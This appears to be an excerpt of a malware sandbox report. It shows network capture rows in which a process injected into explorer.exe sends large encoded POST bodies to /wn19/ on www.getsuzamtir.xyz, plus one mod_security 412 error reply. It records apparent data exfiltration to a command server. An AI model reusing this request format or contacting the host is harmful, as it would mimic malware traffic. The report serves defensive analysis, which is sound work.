AVnXAh=iY3J2sj8f4yUdfPyN4rYIwIYD6W_LzLMlMx5WXzWyy5aZycZD_N1afjEjaVZcMM99zcJjxbvcIrx4eMiIXEaxtK6Z4h-c7qlcACKSO6R1LEzFfPTnsZlEEsnELWWOf1XzcqYyTGIDwiQACTql1vmnUMJSifViK~omhI8zXu4e8YxLiTfZEAgKotslGP2F0u35DVMQliaA0Ts(rHqrT~l4wrmPXJce3H2QmaC8VH6U283UjIk6JFNJ_xiwZnmX0ZgCWEpX-TkowVWqJCTBqAZghV7eE0OQ0HrBvA5e2MInCw3WLL2QRzN2ercz76egzzyvsMUcUxkz33_dmxWdo4z6xrye_aePiQTycGCVYVUaf~1JrBggG2d35gBS3VroxQ-xQsSN-wnziS0BUoNvInPm7chx2Ydo5ASQOAt~dPKiN0EcqoA9zQvu6gA7kYJn2XEfShGS6dSN5WB5ULm4942GzkrJH~6ADdmA5qsLj7SynslvtKUyziV(3Zd7UPVQMUi5HPQrOwhXSVDN6cmcj4UUMSZJkD6o5TzU6ig9Yj3YmztjvhK71ziR-d1uo3gkJCXv5qrTIPyumjZ8l9Iv4b_7EY_jJvUUOEts2N0D7Fb5GV-zFJo2LFcsPe7NbBFQkTMED(kZGTy9yeZczq1oGUvyViMM6jVpFKT7RRp76XV4zFo5ipatU~b7eJNdUlttjAL8RFeA5WvpYFKxywWfEjwjLfYET3ceFAQjdjB(nI5zTTy~6qOy4N10tmKgUWPWEsEDHka6824nQEcAkJPX1ALJkX54sWrJoBDsBLv62BsohJZ9Bl6BEsKIj4gpTuNEwLyuk5cQQE6~AleLvonbpEQnmMGNlG3vlIeFzlRYigELHh2Mbehd_csLWBKb3VoDpTwJyU2h5s8nyZtrIa7zsqxjBipahvdUvEpRSqUxRnbooPZmIN-i531QpcMFtnjEkpXDMSA(gOAK1MCsnGgymvLvLrIvd4oNlaVH6pKvm7wDH0WRSwzjMj0Ph5MHQ0zvKJHmY718sI_OrsaWRJv6e5viHWeNYU3Q7sjN0OjhlAfLzTbOrOLo_qd1kcpxh3T66j-Bel6r1AYbqj0lF17nnIgqyAT79FVczTZb3bPF9F_WvfxiXiQF0d-NOaEXSA33gpblGFQBPZ48Z4x2Fara1LcUr3BR_XJMfrllMVJZQP0IUmOqsF-KsdWfuwiF3Nj(1Rc~KJNvoiZqxtVfUDe5CBVoh5TO4RJErAHBLIJ9ZJaM32Ety54vyU8bm5sA7AM32YZFiFaeDsuZAvEPtk7EHaY~zgI7w5thUyvE7Gv~wObEGA0g3himGWhz8HMuXyYVd353sdhuGFxPp9o09~qK0r4AXI5kYkgzimcXGs1jpxHN_aYme10S7OyV68JlWIP(tdoBjKcW-OcVW(9kNE-5l470-JmIzFO0muABTPdhGbQZzRqXpbSjiY1lhWT9wxcnDcP4aR71zHCRMXLso0Lk3U1MWGrzfB1BP96jwNw3gnv9ojJxDrjvL1nUa9ywBnUrCmMzheyuGlOijtsNAcEe0eMptXp(vw17TY8MUFcBWK5QRtHGI0Pwoaanc1cqnhvFbYavFlcWfM4l0F6gwTLi9VgIrZldRBjcNi6rwecMwt79p29p736sZi9NDcAFwV9KwUFIAF27Im_tzc0deRiIgQkf6b-H0dIEXk2WtZTSaw870oA2OY9sQd1hWIEWRYOWq3-BI8iSDMUKc7FUX94OLJv(zSdyxlIgexQ5eqQDxvmqbN2C7aGuMRCfRIVXvJXi3So2QBFwEgeIRMnYz5LcJsJiOs3Aab59o~J27z3qlmjc_gB~jhWIDw5TrWrwe2PMwipBP96qFSFXpbYiX4Nub5hu6aXp7IWhMHAl-HeNNV70K(F4rWLmyp09EMR(O(3NU7kFrsobhv9eqeDQYu3LUGXLFziZjMbT6lk1U(o2k21PEissY2cuL5JRyJD49~bFjcE2AYAQ85hKfQD0Gsa~6xE(HC4QCzaizb2cYaXtZn7Kd7FbI9_DZJ7ZXJk17UhLTc9Q8vUFoOd1RCtzBPmwo0fF_XcE49Q531VdUVe2BBVpbcyPC3V2yy1n9iFsMGtGQZX25ku3T3c0R7htAZ1fv1BXqhdhkqwcYqZER9OLdngbE3M57hdMgyUb9nUCpwyiVW3OhiFw7FYzuOlKgcyZX75g9gfCR5ZGYeSOAY9aTvmfbSim-EMz2SxHL6cFg5jRFO1clF_eUmyse10~qSNEvwaBA4d2s4PqzACLJQaIJjqlVjmda98z_sycPnt0N9CSUfPXewP9Ww14Ewb0EPEmTGdkH07nRdlPljDNVquL7Snla99KqFl9vD4SDuo~bLoFugwE_2WchclVGvBEZWhn_I4PKid62s3wzqlYR3R~i6a(lrJF1FEszJv6vi6(6DaQEb4Tl9dsoZTBu3ANThrUW2cwMZ8Z4g2p75QMoVKu3UjEUVTgV(CMT(1WJKDsiB_RXx7OHPhkQVTH86tZNrbnE09X003LktpFFRkGa(4w2tbWQImsvQ9OvfQyJn0p-4itMdWp1(gf_08F1lYuGyt7cl-afDAotEBBtTy5BwCYgopr39UrcOkJSdkiUIrdF(2FdVYETjUDuL9gV0_Vtyqsri4YDcvzFBTFJPwiHgomwsNN3ex3xRvu0KJdE5LLhgFCJkvAMZhxnzwjeu6R3PeI0r0TPMhPtWfh7MnMDQ8SkO3Y3AlBGPPlZ1xVzuL7Z2FdUgyOiTvtwOhn5tbK518AFRzvbARtd1nfcyCVUO_8NUsvc9BJSpkdA2dq-xMS540GafvQ9SPtRkGRCHRseTWirKpg_~NH8pINRZXj-F8GDUNwLAAcwkHw2acP-a0AufSoG7fA51pPzPSD_kAR6f19VVOgAmtuYotl0vSDJIkoPtz6QYiT_Mo13j2pcWqF9gTsY6Ti6GU(me6qo9oDYtwxmKrYQIU8noLC-O0VMxcY9k8ze7lFOdhEDzCNb5NoK(uVTR2XKA90oKrwWycuJtJKR6XLC1NzVqhtyRLCSGRwQlUYk3QcM4hosz1NbHVwfpTNQcUh_isnGirSZdHvPqVTTrpUC2Q0tJ4FZx9fTsX3KgA5xy8FbPIR-3VkzWDtj(RZpuf8DzAq40vaVOrr2eYVAhym29jt1BzjneDJUBk~ePhazO4bxvjE2cEw4dShVEOLL0sP8Fl~iAgBxdxpI(9hXe9X2lfBzy07LgDP0pus0eVCz0ifmC36lpMfnff9aRV85T_tvZr6U5nvjajtw6F6rVYziYLbrQvK-XC2-n9f6pgoWdrFHGi0wrdVzK8w15E8uBluYBUuOgy(bC20AtQ6bm1tQfFjGpLPJXO6a2CXqsBFQQkOXWnE0h4PX2yf83Ltb52YUF9O81tX4iC71yZO2UlPAxu~vJpcIIAHOjQkYHgu7VdHV3apcLib3i0TlO9FFsygbWvPufo7ViUzxeV5pugvWp5jgP3mVHfGw8qQ3ydqVaeNgUvxZtzUuyvSRjjdUdvphDhSYC1KxCdVEtApgspn-Ni~98uwOo1MqVTizT-4zKHtVE4(ntWQToqVnKBvW0rTlPrLxz9MrMBNAqDIVd20oaUznIW0eIh64TtgU5DSqf9HuanYP1X1TJOjOMPCKAOZU3zhbUpWit9VFM9HvdhRIAOntKkjncJrLLDxa20dJoMlFT246q_cP4KlsVeN8R236K_~4bFLHHdK3rr3GnpKTa08Gb3nlCnPG9Zr_T-9l4HDoGmPi21da(p5h9JPHfoeqSXsTCgIZDDMCHHtmdRPOfW~yk3IaMPATICmkD2AFaVPQd2njgkctTttVIoTDUgBjPZzOTyBHTBLvtZqFwjd9RYFLhyVJEi7eldyd2XfoUQbc92TJ844B6dC-I9XVPEXb4BLQxOcZO5JTKME5x8GSYs5eCtkUwUXVZLgT~LQ5hatoVB1P2bELMYh31IFPLfrP(3W68AHFxvj3S0K-Tk9l1AzwneHVReq60leIYxgrm8SddzGADBlbyJ8Fzl(XYGAzJMLMokGYvK5xNssqZDe0a8SL~eMAVwO7b-dKg7S_Bcjbz
May 10, 2022 14:26:26.762265921 CEST	9627	OUT	Data Raw: 41 32 44 51 36 61 34 47 74 4d 52 4a 6c 77 75 30 7a 53 6b 78 70 6b 75 59 34 51 30 69 4d 78 34 66 75 58 57 7a 67 43 70 37 52 4f 2d 34 52 70 78 33 30 74 46 41 77 28 59 37 55 42 49 78 57 4f 30 56 63 78 58 51 2d 4c 7a 68 52 4d 58 47 47 58 63 67 57 62 Data Ascii: A2DQ6a4GtMRJlwu0zSkxpkuY4Q0iMx4fuXWzgCp7RO-4Rpx30tFAw(Y7UBIxWO0VcxXQ-LzhRMXGGXcgWb_oshPdfYad-o5cSgYaRvGKdZg7eCaliTQ5xGnpSbK4ocaMPcgMF0EoHQ0FSzhsphJFO3ul6qfEK950882DDVhrrUltxz9i2XrUwlsn990X2XqvkWiMCk3SKofT1z5rM5EPYPksAiA2-esBPWW1_tEfX(gDpjL295g
May 10, 2022 14:26:26.879125118 CEST	9632	OUT	Data Raw: 51 74 4e 49 4e 6b 2d 58 30 4f 50 75 31 6d 68 73 59 50 6c 51 70 66 70 68 32 69 79 52 4b 61 5a 6f 39 57 6a 75 35 6c 45 6f 57 76 46 51 65 4c 4b 39 74 33 74 32 37 4b 4e 48 77 65 2d 66 6e 41 79 73 46 7e 4b 50 51 4c 37 7a 75 65 33 6a 7a 38 57 67 66 76 Data Ascii: QtNINk-X0OPu1mhsYPlQpfph2iyRKaZo9Wju5lEoWvFQeLK9t3t27KNHwe-fnAysF~KPQL7zue3jz8WgfvQMBpNrKXAR7PhfNBsE_EE9IC9jVzb91vcyr4li6zaMK(_CHDQ4IWoZEUXVr(0AKuWDVjbXlB9pOzavD7PUYOhtw11nug7Yhb4rZjgBxaq6u4XAp3GF3QBQNo4dUAH2DxGzApukoUgVWbw(JrJkFFvuxPNDHYWTP6k
May 10, 2022 14:26:26.879251957 CEST	9635	OUT	Data Raw: 58 50 6c 51 39 34 69 48 54 48 51 54 76 4c 44 49 58 76 54 78 6d 28 59 68 70 65 49 45 43 63 6a 55 45 72 79 67 5f 66 54 77 70 4e 64 71 47 69 6c 33 36 73 63 33 59 6f 51 33 54 47 4a 4d 52 71 39 63 2d 41 54 44 52 56 32 7e 35 4f 41 75 38 39 61 31 45 6c Data Ascii: XPlQ94iHTHQTvLDIXvTxm(YhpeIECcjUEryg_fTwpNdqGil36sc3YoQ3TGJMRq9c-ATDRV2~5OAu89a1El5TUGZo9lWIQtDoXDsVJqhv-I1it6vWsgvDFzsISDJpM7Y6AByEpjAO1S7J2VcPdRTrYUTHFahuQYeOYUtEPUOtLrJGk8vkpSYpGXIxmx5d6(mp8fyO6Vs5Es2hUUUl9MjqIMVaeetaa3FLhSIiv0GwJF5(ZEG0ZK1
May 10, 2022 14:26:26.879476070 CEST	9653	OUT	Data Raw: 42 42 78 64 50 30 67 5a 53 39 32 69 65 76 65 31 33 78 32 76 43 64 33 5a 34 42 79 58 30 78 65 39 6b 54 48 7a 69 43 4a 52 44 51 71 61 44 57 74 7a 62 68 6f 72 4d 35 4a 4b 45 7e 4a 4c 39 44 75 7e 72 7e 37 61 59 52 6f 63 32 71 50 72 66 79 4d 4e 65 66 Data Ascii: BBxdP0gZS92ieve13x2vCd3Z4ByX0xe9kTHziCJRDQqaDWtzbhorM5JKE~JL9Du~r~7aYRoc2qPrfyMNefRE0kJ7-Ab5VOpwh22w0nv8flsdiABhgI_KUfWF0SEiIPTzIh9F-hQea8slWC2t8MJm4gJuTxXebwDs3wZGR5uhaBvSD6ZH7FiM-VUBoqiQfjFR5pxuOCJK08LxAA5Y9pY246qW5Kju17ZMNLghKjTdIxvHDbzNYIN
May 10, 2022 14:26:26.996006012 CEST	9656	OUT	Data Raw: 65 42 52 59 63 6f 74 79 74 6f 55 46 53 59 4f 32 54 58 77 7e 4a 48 6d 4f 4e 58 78 64 55 4b 4c 39 79 4c 41 68 6b 42 56 44 35 56 76 61 4a 51 52 48 4c 32 33 71 6a 49 67 30 4c 77 72 4c 6c 35 4c 4c 49 30 77 37 42 67 67 47 72 73 71 77 48 75 5f 52 50 62 Data Ascii: eBRYcotytoUFSYO2TXw~JHmONXxdUKL9yLAhkBVD5VvaJQRHL23qjIg0LwrLl5LLI0w7BggGrsqwHu_RPbYew6Y7D(rYNP2KJQMxZcszQIGhGkTxj(NIt8pwb~KdfHuf3uH9YgYAPt9ZOA5mzVIcRn42955KAYdoTTTXpYwxjpiTsdB9G9DVhw81mnopScRAvfDdFprqzs0qiKNdqp2cVyHTKjx2dswPgUC(IKrW6u7x_Ts9hS_
May 10, 2022 14:26:26.996120930 CEST	9663	OUT	Data Raw: 6b 6e 6b 4a 33 51 72 77 74 76 30 6f 43 79 49 4b 69 46 68 7e 76 6d 49 76 74 6e 67 56 37 4d 51 7e 75 55 31 49 77 42 2d 45 6a 4e 5a 6a 4e 72 42 79 7a 70 77 68 55 45 36 50 66 66 6a 4b 48 68 62 55 63 48 53 66 4c 75 6f 66 57 28 30 66 5a 32 4f 6a 42 39 Data Ascii: knkJ3Qrwtv0oCyIKiFh~vmIvtngV7MQ~uU1IwB-EjNZjNrByzpwhUE6PffjKHhbUcHSfLuofW(0fZ2OjB9iQU(T2oVrgidF2Nq50SBW8rBHh9Hx41JkRkI7ICgK4PFY7uP5BMOm9certnh8c42g9gibjZlUQ3lqL2ku6WnYP9266LtN1vzRxTXWSPLeLZ~EdHL4jzFd6c(iTZwjNbPf2A54O2Bu7Rf0iwiZuZ~obFSW2mzOmOqJ
May 10, 2022 14:26:26.996356964 CEST	9673	OUT	Data Raw: 4c 31 45 78 75 6d 69 64 4f 4a 45 63 4e 72 31 37 6d 4d 73 67 30 47 34 42 72 6b 2d 62 74 63 57 74 43 43 68 6b 68 44 33 46 30 6b 41 44 56 4a 5f 5a 51 75 53 4c 4b 68 50 30 73 6a 52 52 6f 70 70 4d 61 4a 66 63 6c 58 77 5a 39 48 4f 53 54 7a 75 6a 34 42 Data Ascii: L1ExumidOJEcNr17mMsg0G4Brk-btcWtCChkhD3F0kADVJ_ZQuSLKhP0sjRRoppMaJfclXwZ9HOSTzuj4Bqv0UqKkWUIzJeeUTT3KkcDTpoLV(DG2m-IJSJs3GHz-833GiokYd3NW0mjQJGtizXXO2U(c0SS8eNuDiQHYWs14Z31NNsmSMttBoOP0ok9KDiapXaun4wv64Mp4ZAPN4cYjUR~vByvB6EMbmfGpx7f-vs7p2MErlF
May 10, 2022 14:26:26.996486902 CEST	9678	OUT	Data Raw: 4f 39 39 78 5a 6f 49 77 55 55 4d 55 31 4b 64 6e 75 79 6f 46 74 64 37 47 77 71 55 52 61 7e 4f 35 72 75 76 6a 66 5a 45 59 53 64 69 78 5f 31 38 39 4b 4c 6e 39 33 6d 5a 46 4e 62 2d 31 69 39 7a 64 53 72 48 31 76 31 2d 38 6c 48 4b 28 67 79 6f 63 5a 43 Data Ascii: O99xZoIwUUMU1KdnuyoFtd7GwqURa~O5ruvjfZEYSdix_189KLn93mZFNb-1i9zdSrH1v1-8lHK(gyocZCIctDbYpTQo70CIhj-LO8SKIaV0iUWTdGh9PYcWASqX0sAbUJ3bBSkxYPNZ1(1xhDn719TRzeyAIONLUExpaAE6RQM7FQFmNfhukiHcC380a(f5d685i7IOCnZUq34Z_JPCDQFiw~7TVjLQbXstmMs4TCkQ5RwKXE-
May 10, 2022 14:26:26.996702909 CEST	9689	OUT	Data Raw: 45 44 65 58 77 30 31 63 79 7e 6e 6b 42 78 34 4a 47 39 4e 41 37 59 79 4e 4e 38 31 57 79 43 62 57 50 54 5a 6d 33 34 48 34 67 53 6a 52 73 54 71 65 6c 45 34 78 4a 39 77 37 34 4a 59 78 6e 4c 30 42 38 61 4a 76 48 4e 75 76 66 6e 6e 61 71 4a 37 4e 75 39 Data Ascii: EDeXw01cy~nkBx4JG9NA7YyNN81WyCbWPTZm34H4gSjRsTqelE4xJ9w74JYxnL0B8aJvHNuvfnnaqJ7Nu9-qUD3MsMf9u36ekZQkHsg7tpSq3ivYdr6bygWsphtKwn4sOX6zYGrinXzVRgb6fSpbzI6Ml9mMCG4AkADH0SL8A0qcG2hUZ~NHxPYZC(KAnJxGfyfCUFAimzwHfY3DcVCqgSNs9KCcQpEhO1SWUjFzxMvsmI03SO9
May 10, 2022 14:26:26.996840000 CEST	9698	OUT	Data Raw: 66 75 72 6a 58 32 38 6e 31 7e 72 51 6a 57 53 63 46 48 35 51 79 52 50 53 57 65 68 47 38 63 2d 41 72 66 48 50 47 72 36 5a 4a 28 33 6c 78 41 56 41 4c 57 73 7e 35 6a 39 47 66 69 74 49 70 58 51 76 35 30 48 54 73 64 59 30 47 4b 56 58 32 64 6b 72 72 48 Data Ascii: furjX28n1~rQjWScFH5QyRPSWehG8c-ArfHPGr6ZJ(3lxAVALWs~5j9GfitIpXQv50HTsdY0GKVX2dkrrHDHI33lj99b68BIDfGNulZtAhxT-6-O9vNa6q0VbeB7MPYkv0L6B6gAQ3P9zpc94oSRoixB9qhFzJ1ZEu3rf(EXu3Su9L-gMLq8NEeI5~a1cKjiCgTDLaQ5p3gyKVQvtQDyRpdX4znzF7PBqEk2bEBRAAcKjTAu58L
May 10, 2022 14:26:27.376398087 CEST	9845	IN	HTTP/1.1 412 Precondition Failed Date: Tue, 10 May 2022 12:26:26 GMT Server: Apache Accept-Ranges: bytes Vary: User-Agent Content-Length: 606 Connection: close Content-Type: text/html; charset=iso-8859-2 Content-Language: en Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 32 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 34 31 32 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 0a 3c 70 3e 59 6f 75 72 20 72 65 71 75 65 73 74 20 67 6f 74 20 66 69 6c 74 65 72 65 64 20 6f 75 74 20 64 75 65 20 74 6f 20 70 6f 73 73 69 62 6c 65 20 73 65 63 75 72 69 74 79 20 69 73 73 75 65 73 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4f 6e 65 20 6f 72 20 6d 6f 72 65 20 74 68 69 6e 67 73 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 77 65 72 65 20 73 75 73 70 69 63 69 6f 75 73 20 28 64 65 66 65 63 74 69 76 65 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 2c 20 69 6e 76 61 6c 69 64 20 63 6f 6f 6b 69 65 73 2c 20 62 61 64 20 70 61 72 61 6d 65 74 65 72 73 29 3c 2f 70 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 79 6f 75 20 64 69 64 20 6e 6f 74 68 69 6e 67 20 77 72 6f 6e 67 3a 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 74 72 79 20 61 67 61 69 6e 20 77 69 74 68 20 61 20 64 69 66 66 65 72 65 6e 74 20 62 72 6f 77 73 65 72 3c 2f 6c 69 3e 0a 3c 6c 69 3e 61 76 6f 69 64 20 61 6e 79 20 65 76 69 6c 20 63 68 61 72 61 63 74 65 72 73 20 69 6e 73 69 64 65 20 74 68 65 20 72 65 71 75 65 73 74 20 75 72 6c 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6f 6e 73 69 64 65 72 20 72 65 76 69 73 69 6e 67 20 74 68 65 20 72 75 6c 65 73 20 6f 66 20 74 68 65 20 6d 6f 64 5f 73 65 63 75 72 69 74 79 20 6d 6f 64 75 6c 65 20 6f 72 20 74 75 72 6e 69 6e 67 20 69 74 20 6f 66 66 20 66 72 6f 6d 20 79 6f 75 72 20 57 65 62 20 48 6f 73 74 69 6e 67 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 2e 3c 2f 70 3e 0a 0a 3c 68 72 20 2f 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>412 Error</title></head><body><h1>412 Error</h1><p>Your request got filtered out due to possible security issues.</p><p>One or more things in your request were suspicious (defective request header, invalid cookies, bad parameters)</p><p>If you think you did nothing wrong:</p><ul><li>try again with a different browser</li><li>avoid any evil characters inside the request url</li></ul><p>If you are the owner of the website, you can consider revising the rules of the mod_security module or turning it off from your Web Hosting Control Panel.</p><hr /></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49772	199.192.29.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:26:47.299779892 CEST	9859	OUT	POST /wn19/ HTTP/1.1 Host: www.getsuzamtir.xyz Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.getsuzamtir.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.getsuzamtir.xyz/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 61 68 74 39 59 54 6c 62 4e 55 66 32 5a 50 45 33 56 66 43 4f 36 52 72 62 6b 49 31 48 33 31 67 30 4c 53 75 68 4a 42 37 4c 6e 35 43 63 55 75 35 58 6b 61 36 6b 44 37 61 70 41 78 71 7a 76 6c 64 67 50 56 34 6e 46 37 52 34 62 30 45 52 37 43 4e 31 38 4f 36 68 57 30 6f 53 72 75 47 51 6c 55 78 4a 7a 4e 4d 55 39 54 4e 43 55 31 74 6e 6f 47 34 45 70 78 41 70 31 54 30 39 62 39 45 79 36 48 6a 50 47 55 6e 48 30 6a 35 6c 35 41 4d 4f 37 33 28 71 61 5f 77 73 47 4c 6a 31 6a 6d 35 48 37 62 33 45 6d 4e 66 65 58 47 7e 5f 4d 33 4b 78 32 42 45 34 49 42 36 32 74 47 31 75 79 74 39 50 68 45 6e 6b 6b 4f 71 44 5a 4d 32 35 77 49 6b 33 47 62 52 78 4b 69 6f 33 68 73 79 69 73 31 7e 4d 48 39 6f 59 6e 75 6f 76 6b 70 44 64 39 4a 54 70 6c 6d 43 71 6c 38 6c 73 55 6c 43 69 30 74 38 4e 44 37 4c 34 6c 4f 51 66 54 51 39 36 75 4b 47 65 67 48 4d 51 78 47 72 56 74 4f 57 35 6f 34 62 35 61 6d 45 6e 72 52 52 59 4c 4e 49 45 5a 53 6f 62 68 51 34 36 37 6b 6f 62 35 79 31 6d 6f 5a 6b 49 66 43 54 30 41 5f 5a 62 62 74 6b 69 52 77 43 38 79 30 42 55 47 45 4d 63 79 59 4d 4c 6d 67 61 73 34 5a 6b 71 32 57 33 37 48 67 30 5a 77 4c 6b 32 39 4f 57 47 64 6c 45 71 70 62 74 72 4d 4f 58 4d 34 6a 37 6f 35 35 77 5f 44 41 38 62 4f 48 4b 79 65 5f 49 76 67 32 56 67 51 79 36 68 43 42 55 33 28 6b 43 78 51 55 6f 6b 6c 62 43 48 48 6b 66 49 55 63 49 6a 69 52 68 62 34 30 79 58 34 75 7e 4b 6c 62 30 44 74 62 4a 42 77 5a 52 6f 47 68 78 66 42 74 7a 47 6e 41 68 41 57 4f 4d 57 57 44 4c 6f 67 52 76 6a 72 35 61 73 56 6b 70 53 68 38 63 6c 39 4d 66 7a 37 33 37 5a 77 73 64 39 4c 7a 4d 63 50 6e 28 47 6a 55 35 63 4d 4a 46 69 52 4a 42 4c 62 42 77 33 45 58 6f 62 58 59 43 52 4c 57 31 36 31 69 50 37 51 57 55 30 6f 73 68 63 66 53 76 76 61 2d 51 68 36 6c 58 6f 37 6f 35 52 6c 4e 45 35 4e 6d 53 5a 67 59 70 6a 70 59 49 35 58 33 55 69 69 4c 7a 4d 4c 6c 42 51 76 42 6b 34 62 32 71 70 6d 43 79 71 41 48 72 50 6c 4d 77 47 64 6e 64 54 64 68 39 6d 6e 61 6a 6f 51 41 63 57 30 46 39 6b 73 2d 52 6e 4a 32 5a 68 50 62 77 53 4e 68 70 61 28 53 45 37 79 6f 38 66 6e 4a 48 34 65 4c 67 63 33 62 46 57 39 50 78 6a 76 71 41 7a 59 6d 50 35 6e 73 52 34 4f 53 5a 46 4c 56 31 77 72 52 30 50 42 4c 71 75 6f 52 61 51 38 61 57 73 7e 37 61 35 47 6d 61 36 31 41 41 63 30 69 4a 72 28 4f 33 46 33 43 6c 38 69 41 35 2d 41 44 66 38 41 74 50 31 63 62 56 30 41 55 52 6a 79 47 65 76 70 6d 34 7a 75 36 7a 55 7e 47 55 59 72 6f 6d 6c 58 76 33 78 71 37 35 4e 58 4f 58 79 41 44 5a 32 59 58 5a 75 65 6f 50 31 7a 4b 32 7a 41 42 5a 46 45 5a 77 38 4f 6d 76 31 4f 30 53 39 75 77 54 31 54 37 48 71 52 57 38 71 62 62 72 50 68 55 79 62 61 45 56 31 53 51 38 62 36 59 77 53 6e 4c 31 48 73 4a 48 4b 78 6f 61 4a 67 48 45 73 6e 31 63 6d 42 62 46 38 6f 50 31 63 55 52 79 78 71 79 77 68 76 79 52 75 6f 64 48 68 63 32 46 6b 7e 6b 65 6e 71 67 42 62 4d 51 50 4a 71 64 47 32 52 33 53 48 71 37 56 4c 45 6b 54 55 55 50 67 38 35 47 69 54 59 52 72 30 54 46 4f 58 5a 56 36 71 4b 62 41 45 72 52 74 6b 46 57 38 6f 55 74 31 73 7e 65 49 71 30 5a 35 46 56 71 4c 38 72 63 44 67 44 66 4d 5f 73 43 62 43 50 2d 68 50 70 58 55 45 28 66 70 4d 77 41 5a 58 6d 4d 66 4a 50 79 71 49 52 44 71 6e 32 62 30 67 57 43 63 75 4a 4b 46 77 45 33 33 68 46 35 6a 65 4c 73 42 68 59 63 46 41 45 50 69 4f 35 49 28 67 42 5f 37 77 69 68 78 6b 79 75 59 67 71 4c 37 30 72 67 67 6a 62 72 48 50 7a 32 76 42 32 63 5a 75 41 36 70 69 56 49 37 44 6d 72 7e 62 4a 6c 66 6b 6d 31 38 74 64 72 47 64 4d 43 48 61 4c 6d 43 48 47 6b 47 4c 55 53 4c 74 5a 6b 6e 6e 4b 38 6c 57 68 6d 62 65 28 6c 28 2d 51 4e 66 6e 58 71 6f 45 68 2d 57 6d 46 51 6f 4c 50 69 72 62 6f 4c 5a 50 53 72 7a 5f 44 6a 46 71 4b 77 4a 34 68 4e 63 75 36 4c 75 54 52 4a 35 78 54 38 30 71 37 6d 6a 76 43 6c 65 56 43 4d 73 77 30 79 4c 4a 7e 30 50 73 74 44 32 4f 6b 36 4c 37 5a 4a 51 44 6e 54 6f 51 67 68 7a 37 51 65 28 37 57 4a 49 44 6d 75 68 56 62 6e 71 75 4e 6b 73 33 33 64 45 71 7e 43 6d 6d 28 49 65 64 6f 46 67 43 28 49 74 4d 6e 53 53 72 58 70 57 45 76 58 38 68 37 63 4d 76 59 41 6d 61 48 54 68 76 63 32 63 61 6a 7a 43 70 62 73 38 6b 73 48 41 6e 7a 61 57 51 42 65 50 36 4c 61 41 32 48 71 79 4e 69 4a 72 6d 59 4e 4e 37 53 49 62 4d 57 70 34 4d 56 77 55 36 4a 6e 5a 53 48 53 34 48 Data Ascii: AVnXAh=aht9YTlbNUf2ZPE3VfCO6RrbkI1H31g0LSuhJB7Ln5CcUu5Xka6kD7apAxqzvldgPV4nF7R4b0ER7CN18O6hW0oSruGQlUxJzNMU9TNCU1tnoG4EpxAp1T09b9Ey6HjPGUnH0j5l5AMO73(qa_wsGLj1jm5H7b3EmNfeXG~_M3Kx2BE4IB62tG1uyt9PhEnkkOqDZM25wIk3GbRxKio3hsyis1~MH9oYnuovkpDd9JTplmCql8lsUlCi0t8ND7L4lOQfTQ96uKGegHMQxGrVtOW5o4b5amEnrRRYLNIEZSobhQ467kob5y1moZkIfCT0A_ZbbtkiRwC8y0BUGEMcyYMLmgas4Zkq2W37Hg0ZwLk29OWGdlEqpbtrMOXM4j7o55w_DA8bOHKye_Ivg2VgQy6hCBU3(kCxQUoklbCHHkfIUcIjiRhb40yX4u~Klb0DtbJBwZRoGhxfBtzGnAhAWOMWWDLogRvjr5asVkpSh8cl9Mfz737Zwsd9LzMcPn(GjU5cMJFiRJBLbBw3EXobXYCRLW161iP7QWU0oshcfSvva-Qh6lXo7o5RlNE5NmSZgYpjpYI5X3UiiLzMLlBQvBk4b2qpmCyqAHrPlMwGdndTdh9mnajoQAcW0F9ks-RnJ2ZhPbwSNhpa(SE7yo8fnJH4eLgc3bFW9PxjvqAzYmP5nsR4OSZFLV1wrR0PBLquoRaQ8aWs~7a5Gma61AAc0iJr(O3F3Cl8iA5-ADf8AtP1cbV0AURjyGevpm4zu6zU~GUYromlXv3xq75NXOXyADZ2YXZueoP1zK2zABZFEZw8Omv1O0S9uwT1T7HqRW8qbbrPhUybaEV1SQ8b6YwSnL1HsJHKxoaJgHEsn1cmBbF8oP1cURyxqywhvyRuodHhc2Fk~kenqgBbMQPJqdG2R3SHq7VLEkTUUPg85GiTYRr0TFOXZV6qKbAErRtkFW8oUt1s~eIq0Z5FVqL8rcDgDfM_sCbCP-hPpXUE(fpMwAZXmMfJPyqIRDqn2b0gWCcuJKFwE33hF5jeLsBhYcFAEPiO5I(gB_7wihxkyuYgqL70rggjbrHPz2vB2cZuA6piVI7Dmr~bJlfkm18tdrGdMCHaLmCHGkGLUSLtZknnK8lWhmbe(l(-QNfnXqoEh-WmFQoLPirboLZPSrz_DjFqKwJ4hNcu6LuTRJ5xT80q7mjvCleVCMsw0yLJ~0PstD2Ok6L7ZJQDnToQghz7Qe(7WJIDmuhVbnquNks33dEq~Cmm(IedoFgC(ItMnSSrXpWEvX8h7cMvYAmaHThvc2cajzCpbs8ksHAnzaWQBeP6LaA2HqyNiJrmYNN7SIbMWp4MVwU6JnZSHS4HIb4vpXOfZR~_7PVRpTqVZciozUbcEcx4~xCu68c-lvpOfzMmwImi(k~